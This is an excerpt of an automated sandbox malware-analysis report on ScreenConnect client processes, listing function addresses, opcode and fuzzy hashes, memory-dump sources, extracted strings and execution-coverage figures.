Instruction Fuzzy Hash: BAF08C353093589FC3419B6DE82842A7FB6EFCA21131486A7EA06CB3A1CE309C56C761

Function 00E56EF2 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7676d09b4281e54f838e9764574902376c5f267620ab234706583b4165a0fb04
Instruction ID: 2287731074904c82784ea9628e702595574ce47957e078e61ae2445d45e7f83d
Opcode Fuzzy Hash: 7676d09b4281e54f838e9764574902376c5f267620ab234706583b4165a0fb04
Instruction Fuzzy Hash: 7CE09232300318AB8B14AFAEB48852AB7DAEBCD7627518439F609C3350DE759C0583B1

Function 00E512B0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61df76936e7d911c9bc65fcbf1c296e5335f8f2b11572846f092571785f92185
Instruction ID: 2b5641b61ce2859a29d57f030b917d15481f6216ac229c729381a93e4edf5eea
Opcode Fuzzy Hash: 61df76936e7d911c9bc65fcbf1c296e5335f8f2b11572846f092571785f92185
Instruction Fuzzy Hash: 1EF0E5393406048F8702A66DE85156E77D9DBC4721310C43EE519EB314DF30EC499BE1

Function 00E50838 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dab6b7eb4d8ce8f479a27c64e3a490b9e5d5e9f79adade788f67dd6922265ffb
Instruction ID: b6758dc0477ed2b9deb3924e88a0e8903b039cec74b2fcabe4cfa8d33cf62792
Opcode Fuzzy Hash: dab6b7eb4d8ce8f479a27c64e3a490b9e5d5e9f79adade788f67dd6922265ffb
Instruction Fuzzy Hash: 44F0E530905208EFCB00DFB8D881A7DB7F0EF56341B0141E9E808DB306D630AA86EB71

Function 00E58167 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e704f520cf9f75e73f885e2acbba8d62d0fb3c1418ccc73bc3fe3e7143ed8797
Instruction ID: bfcffd7fcd39c94e3796363764814039c2aee774b8320c9e68a4d36b6f3ee9d4
Opcode Fuzzy Hash: e704f520cf9f75e73f885e2acbba8d62d0fb3c1418ccc73bc3fe3e7143ed8797
Instruction Fuzzy Hash: EBE02633A0D2106EC728CFBAA800A9FABDE8FD4214B04C07FE48ED3240E830D402C725

Function 00E56EF8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713a8f2b0050211891a3827f2822add2009a74674d0c944fd688a1c108dc79ab
Instruction ID: 6cc8e4c74722356a0bf062bf9041ae17890a459d5f6fb8d46b59b449587430ef
Opcode Fuzzy Hash: 713a8f2b0050211891a3827f2822add2009a74674d0c944fd688a1c108dc79ab
Instruction Fuzzy Hash: FEE04F36700318678B146BAEB88853ABADAEBC8662754843DF60AC3351DE659C0983B5

Function 00E5181A Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55acb97c1623e304e73681f43d36c1c80a2f24fe4563377869108ede1049a595
Instruction ID: 6d98d3f5cdbe9a876781b7681e5f7b6eee35192aed7a483aeab3f722a4ea9611
Opcode Fuzzy Hash: 55acb97c1623e304e73681f43d36c1c80a2f24fe4563377869108ede1049a595
Instruction Fuzzy Hash: 5FF06D3560A7509FC715AB24D918618BFB6EF06216B4580E6E40ACB352CB36AC94CB56

Function 00E51DF8 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf4c0508cdeba44820fe852dda4d6ef2ee432d6b634744610ad357540f600ad1
Instruction ID: 1a0e131ba3b1641d9b9c5db1cd1adc0932c0f1e0973d991c1d13afed4b0265c8
Opcode Fuzzy Hash: bf4c0508cdeba44820fe852dda4d6ef2ee432d6b634744610ad357540f600ad1
Instruction Fuzzy Hash: CEE0D875906248DFD701DFA9E8815ACFBF4EF4720470041D6D909DB311DA309F06DB51

Function 00E55F78 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54fd519f0a25d7298487bae6aa338d96932eb50713913c4a9e0a442985f6ebec
Instruction ID: a3687d8b360580ebe724fd5d3195dd9cb80f3c305fdaf353c4d26bbae32b9c24
Opcode Fuzzy Hash: 54fd519f0a25d7298487bae6aa338d96932eb50713913c4a9e0a442985f6ebec
Instruction Fuzzy Hash: 14E08C33B01C519B8B10915CAC64655B3DA8B993BAB3C9A71FC28EB380FB21DC0643B0

Function 00E5392C Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccf2c343b15c6dcbbd2087c8b9a4b146c4c92061b638c4610c833665b565305c
Instruction ID: 7bdb6d0b9d0814966694b43b273c594622b5c7663457b6ff0bd4323c6f34405a
Opcode Fuzzy Hash: ccf2c343b15c6dcbbd2087c8b9a4b146c4c92061b638c4610c833665b565305c
Instruction Fuzzy Hash: 90D02E6AB0E2D80FDB0213B838A20F83F34CCC221930900D3C486DB013CA100B2F93A6

Function 00E51DB0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b55eecc04043c8c95f9b67357cff768712756873f1476560d7265fdb4db38146
Instruction ID: 460355a3c5e94f9d6d52df80ec9419503208bcb5bcc2e152d285f37df26f84ef
Opcode Fuzzy Hash: b55eecc04043c8c95f9b67357cff768712756873f1476560d7265fdb4db38146
Instruction Fuzzy Hash: 40E086393102186B42446B7DE80847E7BAADBC9261310C126E90AC3390CE309C12C7B1

Function 00E58120 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f34c11d41767f2545bab64517ddc7e738d5f29815d77a616904cbe313d7eb0c
Instruction ID: e3df0ffd2befe846796bfab70d16523ff451a345c4567b6e42831ff15918f750
Opcode Fuzzy Hash: 3f34c11d41767f2545bab64517ddc7e738d5f29815d77a616904cbe313d7eb0c
Instruction Fuzzy Hash: 1DE04F709193918FC740EF78E954085BFF0AF0A215B0489AED8C9C7251E230A856CB92

Function 00E513D1 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 020fd01de50592b35a412e3490c640fd55a4a4c12eb107a2e0bf198a32900c95
Instruction ID: c4148bf0d58e3ef5121b145e6188a54ad2ec011e58380532678cf7e561b0d04d
Opcode Fuzzy Hash: 020fd01de50592b35a412e3490c640fd55a4a4c12eb107a2e0bf198a32900c95
Instruction Fuzzy Hash: 01E0483610C3914FC713DB3CF8516DDBBE1AF8221470506DAE0418F69ACB55BD4D97A5

Function 00E51310 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f7dafeda787b78a01ff7f1c4c6a1fa9bbc08d37475e337078f851edeaefc53
Instruction ID: 7b30e66289df86ececf80e0c675d96584df62a07e7bb89820d5cab63b49189d5
Opcode Fuzzy Hash: b4f7dafeda787b78a01ff7f1c4c6a1fa9bbc08d37475e337078f851edeaefc53
Instruction Fuzzy Hash: 2CE0BF74D04109AF8780DFBCC955659BBF4FB49204B1085EAD819D7245E63195028B91

Function 00E57FB8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec616beadbbcd262a655b3470b5d28b8a6e3268cc86d7308c8d257abf744f6e5
Instruction ID: 5ca6378f13a991d6009aadb8353d7c3f66aae4f78493878ff65129ad982a2c25
Opcode Fuzzy Hash: ec616beadbbcd262a655b3470b5d28b8a6e3268cc86d7308c8d257abf744f6e5
Instruction Fuzzy Hash: A7E0263000D3802FC301CB24E4877C23FE4DB42220F0888ACE8864F543C626584BCBA2

Function 00E58158 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca71cadd8a982e4bb63ccca91fdf4850608dd24874b3c0644fadecd92648d17f
Instruction ID: e111adf6c9ac8a78f9257fc1340149ac6d2dd0621c151b1ba47fb607d3707cb3
Opcode Fuzzy Hash: ca71cadd8a982e4bb63ccca91fdf4850608dd24874b3c0644fadecd92648d17f
Instruction Fuzzy Hash: 97E0B6745193419FC741DF28D680448BBF0AF06214F05489EE889DB251E631AC86DB52

Function 00E50848 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a7ad0226c8fcd09daa7128130424f03dfa7671c2243ae5cc0294b3b2ab3d2e5
Instruction ID: f78c874f0343897f4ae617815e0f8cdaeb798084bebf6a8287ed6283db4e3732
Opcode Fuzzy Hash: 5a7ad0226c8fcd09daa7128130424f03dfa7671c2243ae5cc0294b3b2ab3d2e5
Instruction Fuzzy Hash: 97D01730A1130CEF8B00EFA8E94156DBBB9EB44300B1082A8D408E7310EA316F41ABA2

Function 00E51E08 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ede5c8e886d0deb6dbde553bc0d8524dad242c24cd3a0d4a261ea6d699bc506
Instruction ID: 6594918f50b202b624055d437ab45e2a87662220ecab60f0204914f02934622e
Opcode Fuzzy Hash: 7ede5c8e886d0deb6dbde553bc0d8524dad242c24cd3a0d4a261ea6d699bc506
Instruction Fuzzy Hash: DAD05B7490610CEFDB40EFF9E94155DB7B5DB44204B1041A9D509D7300DE31AF049B51

Analysis Process: ScreenConnect.ClientService.exePID: 7764, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 01CB87A9 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34e5d058bb43b9abb8bcc861d6c9a9746189e834a604eef5f249b41a42b8ca05
Instruction ID: b701d073471c43f41d5080477cb7a8df851cd7d7e498a1eda1680a4e09f0591d
Opcode Fuzzy Hash: 34e5d058bb43b9abb8bcc861d6c9a9746189e834a604eef5f249b41a42b8ca05
Instruction Fuzzy Hash: 9671C030A00245CFCB01DF78C48479ABBB6AF85710F1486A9D419AF3A6DB75ED86C7A1

Function 01CB4C6A Relevance: 3.9, Strings: 3, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#i, xrefs: 01CB4D5C
`Q^q, xrefs: 01CB4DEB
`Q^q, xrefs: 01CB4C86

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: #i$`Q^q$`Q^q
API String ID: 0-1846407474
Opcode ID: 3cc428f62e32f1d10e91c59725fbfbeb3ac142c3d6f3387465c5d82de444c8b3
Instruction ID: a83994e8a5d8b9a9c7399fe6f5e2721afbea3bdf65102b7cde6106b4426efe37
Opcode Fuzzy Hash: 3cc428f62e32f1d10e91c59725fbfbeb3ac142c3d6f3387465c5d82de444c8b3
Instruction Fuzzy Hash: BC41BE75E04219DFEB649F68D818BEEBBB5FB44300F0084E9D509E7281DB749A48CF92

Function 060E197C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerA.SECHOST(?,?,?), ref: 060E1AB3

Strings

#i, xrefs: 060E19AA

Memory Dump Source

Source File: 0000000B.00000002.2004615120.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_60e0000_ScreenConnect.jbxd

Similarity

API ID: ManagerOpen
String ID: #i
API String ID: 1889721586-3407789154
Opcode ID: 6b75234d98ff36b5caac26a059802a04d8430fd11d8d361ea2a288cb6edbdb5e
Instruction ID: 45ce966b08d93126d809ed3825f71f92e2a340dfd42dc071620b652e9df51431
Opcode Fuzzy Hash: 6b75234d98ff36b5caac26a059802a04d8430fd11d8d361ea2a288cb6edbdb5e
Instruction Fuzzy Hash: BA514771E802699FDB94CFA8C8857AEBFF1EB08314F148569E815EB380D7749885CF81

Function 060E1988 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerA.SECHOST(?,?,?), ref: 060E1AB3

Strings

#i, xrefs: 060E19AA

Memory Dump Source

Source File: 0000000B.00000002.2004615120.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_60e0000_ScreenConnect.jbxd

Similarity

API ID: ManagerOpen
String ID: #i
API String ID: 1889721586-3407789154
Opcode ID: c94159bacdfbaec101a99f54edb6536cddfb68d19212968d7cc45e1ac9a47947
Instruction ID: 3a7d4866ef14a46a3851aa84db9084a00a6ee24000de0e3ece6757010331f7ab
Opcode Fuzzy Hash: c94159bacdfbaec101a99f54edb6536cddfb68d19212968d7cc45e1ac9a47947
Instruction Fuzzy Hash: 28513770E802699FDB94CFA8C8857AEBFF1FB08314F148569E815E7390D7749885CB82

Function 01CBC67F Relevance: 2.8, Strings: 2, Instructions: 286
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 01CBC84D
$^q, xrefs: 01CBC841

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 05c36945a53dbb88eddf08561cd34b88d8c3d6126f18cb4b711ab1e7023013cf
Instruction ID: b2a99764b6df45241fae191752500460e9a3d3db969cef0a6f84626f3ffc180b
Opcode Fuzzy Hash: 05c36945a53dbb88eddf08561cd34b88d8c3d6126f18cb4b711ab1e7023013cf
Instruction Fuzzy Hash: 39C19D30A00359CFDB05EFA9C494AEDBBB1FF85304F10866AD455AB3A5DB34D986CB84

Function 01CBEF78 Relevance: 2.7, Strings: 2, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(&^q, xrefs: 01CBF0A9
(bq, xrefs: 01CBF1C8

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (&^q$(bq
API String ID: 0-1294341849
Opcode ID: b1f4900f8dc3a91980f6073e73d67c386178e8e22befda02593e294e8dfa59f9
Instruction ID: 925621990d4ccaaf7ea3d6ea12e929217427fc80b7af35cdb8863bbd85e31fa1
Opcode Fuzzy Hash: b1f4900f8dc3a91980f6073e73d67c386178e8e22befda02593e294e8dfa59f9
Instruction Fuzzy Hash: A3618231F001198BEB19EFB9C4906EE7AE2AFC9700F144569D406BB394DF34AD42C795

Function 01CB5410 Relevance: 2.5, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 01CB5425
$^q, xrefs: 01CB5431

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: a057c1f7ad7f5db4afbb65092f16dc109cab8c6828855d24c6077a74ff75bda3
Instruction ID: 734381eee7f53f7520b832554aae59eb70c5ab3b4cc15c67938993c99c4d9c17
Opcode Fuzzy Hash: a057c1f7ad7f5db4afbb65092f16dc109cab8c6828855d24c6077a74ff75bda3
Instruction Fuzzy Hash: EFD05E7074020CCFD728CE29D58891233E87B44A0176108A9D645CF33ACE25EC41CA55

Function 01CBFB40 Relevance: 1.6, Strings: 1, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 01CBFB83

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: f757180d070303e77d04e6a77fa4519cee8e789b123c25acd9a19ea8cb5ff353
Instruction ID: eda1b1cb0b637747850fab263e1bc520053f95ff74b855a59af2026f1893fae6
Opcode Fuzzy Hash: f757180d070303e77d04e6a77fa4519cee8e789b123c25acd9a19ea8cb5ff353
Instruction Fuzzy Hash: 17D15C74A40705CFCB45DF68D888A99BBB2FF49300B118699E959AB365DB30EC85CF80

Function 01CB8D98 Relevance: 1.4, Strings: 1, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 01CB8DBA

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: e4457a80352e083e7275fb39dac904d4ae41d9e64a0dd61df03e24c7a9001ec3
Instruction ID: 9a8d9cb3a2d5902cff41c881f77c0a9cb1644ba63f3acb8ef1c3720b52917128
Opcode Fuzzy Hash: e4457a80352e083e7275fb39dac904d4ae41d9e64a0dd61df03e24c7a9001ec3
Instruction Fuzzy Hash: E361F138B102098FDB14DF69D8949AEB7F6FF89314B1480A8E506EB365DB30ED019B80

Function 01CBAAA0 Relevance: 1.4, Strings: 1, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR^q, xrefs: 01CBAC2B

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 4e454133a2a0b1533c2a2d104c3c39a8e3fad0e4f3c970ae042673bb520bc9b2
Instruction ID: 625deb7b46a227c0c9fd09fce2202191db79defc937cbca36a471320437d6d2a
Opcode Fuzzy Hash: 4e454133a2a0b1533c2a2d104c3c39a8e3fad0e4f3c970ae042673bb520bc9b2
Instruction Fuzzy Hash: D5511430B00211CFDB259B38D5947AEBBE2BF84700F14896EE496DB691DB30DC46CB81

Function 01CBC6F0 Relevance: 1.4, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 01CBC841

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 9b9fb6eed3ab4921dfb542dce542e8c676c90c70cb62d6871402d228c6eda7c3
Instruction ID: 232d02007f4d6d25080939665339853ee566b095282e42951bcbc5df9e8b3d0c
Opcode Fuzzy Hash: 9b9fb6eed3ab4921dfb542dce542e8c676c90c70cb62d6871402d228c6eda7c3
Instruction Fuzzy Hash: 0A516D30A00309CFDB14EFA8C494AADBBB1FF84300F118A69D456AB3A5DB74DD85CB84

Function 01CB5DF0 Relevance: 1.4, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

nCvq, xrefs: 01CB5ED1

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: nCvq
API String ID: 0-3590779759
Opcode ID: f37d12e1ea480b99718b87842833a504ae56309bd8823eccb9628af56e17def1
Instruction ID: 010c771cb0d51507e69f4a156b5994ec757f3648dfb4e94d48b54fef36f1332f
Opcode Fuzzy Hash: f37d12e1ea480b99718b87842833a504ae56309bd8823eccb9628af56e17def1
Instruction Fuzzy Hash: 60518070B00206CFDB55EB39D5946AEB7E6EF88214F108478E506DB3A4EF75ED028B91

Function 01CB5DE0 Relevance: 1.4, Strings: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

nCvq, xrefs: 01CB5ED1

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: nCvq
API String ID: 0-3590779759
Opcode ID: e25f2f7718c62cdbe7a32a0807bb0c90f160a29e1d70694b56df989e04d177c7
Instruction ID: a371ad649a9c971bc7df9e3ba34bf89b675bcc8349d632317686acb72dd8b3c9
Opcode Fuzzy Hash: e25f2f7718c62cdbe7a32a0807bb0c90f160a29e1d70694b56df989e04d177c7
Instruction Fuzzy Hash: 0D517F70B00206CFDB55EB39D5946AEB7E6EF88314F148468E506DB3A4EF74ED028B91

Function 01CB7E50 Relevance: 1.4, Strings: 1, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 01CB7E71

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 9f9e4e9151b777d0bcb1763477587566b3872fa8c9c4af0304c6960533f838f1
Instruction ID: c3484f66f36b6524eadfa4315255b48913ddc02ebf871b3b62212597a3da1e92
Opcode Fuzzy Hash: 9f9e4e9151b777d0bcb1763477587566b3872fa8c9c4af0304c6960533f838f1
Instruction Fuzzy Hash: CA41B031A00105CBCB15EF69D5945AEBBA6EFC4310F14C565E9069B399DF34E906CB90

Function 01CB6FE8 Relevance: 1.4, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 01CB70FE

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-1334834377
Opcode ID: 513c5eadd03e7f8645979a42ca849bde96890a3c36ba7f02713787e81680847d
Instruction ID: d53dff529b8a32c4aae553b584dcf0616c9cf120fa3ebddd660d9c71ab0c7ca4
Opcode Fuzzy Hash: 513c5eadd03e7f8645979a42ca849bde96890a3c36ba7f02713787e81680847d
Instruction Fuzzy Hash: 8A312470B013129FCB12AB7E98805AEBBE2FBC9210701456AD825DB3D0EF70ED058BD0

Function 01CB6FF8 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

(, xrefs: 01CB70FE

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-1334834377
Opcode ID: dd44bd26d96df0ac6378bbd73824065689db592f504a2ebbbefed8d018e01b0f
Instruction ID: c5b14c515abc8ddc73a75583b71c9a8d96a8ce4bcb9cff6999f3fba5fda19f7f
Opcode Fuzzy Hash: dd44bd26d96df0ac6378bbd73824065689db592f504a2ebbbefed8d018e01b0f
Instruction Fuzzy Hash: 3531F430B012229F8B16EB7ED8905AEB7E6FBC82107008569D915EB394EF70ED058BD0

Function 01CB52F8 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

#i, xrefs: 01CB5377

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: #i
API String ID: 0-3407789154
Opcode ID: 3871c7b54464f841fcc0ad562a8820cafbff69051c79dc338320b1157ca26d28
Instruction ID: 2d8e61ab98d5f28a72a2cc73e20678d9af940c9a5478ed6bab63d6e7093442ed
Opcode Fuzzy Hash: 3871c7b54464f841fcc0ad562a8820cafbff69051c79dc338320b1157ca26d28
